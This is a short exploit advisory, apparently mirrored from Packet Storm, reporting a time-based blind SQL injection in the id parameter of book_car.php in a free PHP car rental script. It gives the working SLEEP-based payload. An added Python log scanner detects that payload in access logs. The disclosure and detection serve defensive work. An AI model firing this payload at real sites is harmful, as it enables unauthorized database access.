## https://sploitus.com/exploit?id=PACKETSTORM:158856
====================================================================  
Car Rental Script - Time-based blind SQL injection  
====================================================================  
####################################################################  
.:. Author : Yussef Dajdaj  
.:. Contact :  
.:. Vendor : https://projectworlds.in/  
.:. Script : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/  
.:. Date : 8/8/2020  
.:. Tested on : Windows 10 64-bit environment || XAMPP  
####################################################################  
  
  
===[ Exploit ]===  
  
[*] SQL injection  
=================================  
  
https://localhost/testing/book_car.php?id='[payload]  
  
  
Parameter: id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=' AND (SELECT 4182 FROM (SELECT(SLEEP(5)))dQXQ) AND 'CYlu'='CYlu  
  
  
the back-end DBMS is MySQL, web application technology: PHP 7.2.32, PHP, Apache 2.4.43
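
Detection example (added here, not part of the original advisory or the vendor's code): a log check that URL-decodes the id parameter of requests to book_car.php and flags values that call a SQL timing function or are not plain integers. The log lines are constructed samples, and the assumption that legitimate id values are integers is ours, not stated by the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (sample data, not taken from the advisory).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Aug/2020:10:01:02 +0000] "GET /testing/book_car.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [08/Aug/2020:10:01:40 +0000] "GET /testing/book_car.php?id=%27%20AND%20(SELECT%204182%20FROM%20(SELECT(SLEEP(5)))dQXQ)%20AND%20%27CYlu%27=%27CYlu HTTP/1.1" 200 5120',
    '203.0.113.7 - - [08/Aug/2020:10:02:11 +0000] "GET /testing/index.php HTTP/1.1" 200 2048',
    '198.51.100.4 - - [08/Aug/2020:10:03:05 +0000] "GET /testing/book_car.php?id=12%27 HTTP/1.1" 500 310',
]

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TIMING_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)
NUMERIC_RE = re.compile(r"[0-9]{1,10}")  # assumption: real ids are small integers

def classify_id(value):
    """Return None for a plain integer id, otherwise a short reason string."""
    if TIMING_RE.search(value):
        return "timing function in id"
    if not NUMERIC_RE.fullmatch(value):
        return "non-numeric id"
    return None

def scan(lines, script="book_car.php", param="id"):
    """Yield (client, reason, decoded value) for suspicious requests to `script`."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes, so encoded quotes and spaces are compared in clear
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify_id(value)
            if reason:
                findings.append((client, reason, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the injection is time-based, the response status and size look normal; correlating flagged requests with unusually long response times requires a log format that records request duration.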